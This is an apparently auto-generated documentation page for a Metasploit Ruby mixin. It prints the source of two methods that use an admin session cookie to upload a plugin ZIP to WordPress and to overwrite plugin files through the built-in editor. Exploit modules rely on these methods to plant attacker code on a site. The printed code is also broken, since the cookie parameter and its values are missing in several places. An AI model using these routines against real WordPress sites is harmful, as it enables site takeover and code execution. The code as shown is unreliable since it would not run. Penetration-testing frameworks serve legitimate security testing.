Module: Msf::Exploit::Remote::HTTP::Wordpress::Admin
- Included in:
- Msf::Exploit::Remote::HTTP::Wordpress
- Defined in:
- lib/msf/core/exploit/remote/http/wordpress/admin.rb
Instance Method Summary collapse
-
#wordpress_edit_plugin(file, contents, cookie) ⇒ Boolean
Edits a plugin file (relative to plugins dir) using a valid admin session.
-
#wordpress_upload_plugin(name, zip, cookie) ⇒ Boolean
Uploads a plugin using a valid admin session.
Instance Method Details
#wordpress_edit_plugin(file, contents, cookie) ⇒ Boolean
Edits a plugin file (relative to plugins dir) using a valid admin session.
51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 |
# File 'lib/msf/core/exploit/remote/http/wordpress/admin.rb', line 51 def wordpress_edit_plugin(file, contents, ) unless (nonce = wordpress_helper_get_plugin_edit_nonce(, file)) vprint_error('Failed to acquire the plugin edit nonce') return false end vprint_status("Acquired a plugin edit nonce: #{nonce}") # https://github.com/WordPress/WordPress/blob/master/wp-admin/plugin-editor.php res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_plugin_editor, 'cookie' => , 'vars_post' => { 'action' => 'update', '_wpnonce' => nonce, 'file' => file, 'newcontent' => contents } ) unless res && res.redirect? vprint_error("Server responded with code #{res.code}") if res vprint_error("Failed to edit plugin file #{file}") return false end # NOTE: send_request_cgi! doesn't change the method res = send_request_cgi( 'method' => 'GET', 'uri' => res.redirection.to_s, 'cookie' => ) unless res && res.code == 200 && res.body.include?('edited successfully') vprint_error("Server responded with code #{res.code}") if res vprint_error("Failed to edit plugin file #{file}") return false end vprint_status("Edited plugin file #{file}") true end |
#wordpress_upload_plugin(name, zip, cookie) ⇒ Boolean
Uploads a plugin using a valid admin session.
11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 |
# File 'lib/msf/core/exploit/remote/http/wordpress/admin.rb', line 11 def wordpress_upload_plugin(name, zip, ) nonce = wordpress_helper_get_plugin_upload_nonce() if nonce.nil? vprint_error("Failed to acquire the plugin upload nonce") return false end vprint_status("Acquired a plugin upload nonce: #{nonce}") referer_uri = normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload') data = Rex::MIME::Message.new data.add_part(nonce, nil, nil, 'form-data; name="_wpnonce"') data.add_part(referer_uri, nil, nil, 'form-data; name="_wp_http_referer"') data.add_part(zip, 'application/octet-stream', 'binary', "form-data; name=\"pluginzip\"; filename=\"#{name}.zip\"") data.add_part('Install Now', nil, nil, 'form-data; name="install-plugin-submit"') res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_update, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s, 'cookie' => , 'vars_get' => { 'action' => 'upload-plugin' } ) if res && res.code == 200 vprint_status("Uploaded plugin #{name}") return true else vprint_error("Server responded with code #{res.code}") if res vprint_error("Failed to upload plugin #{name}") return false end end |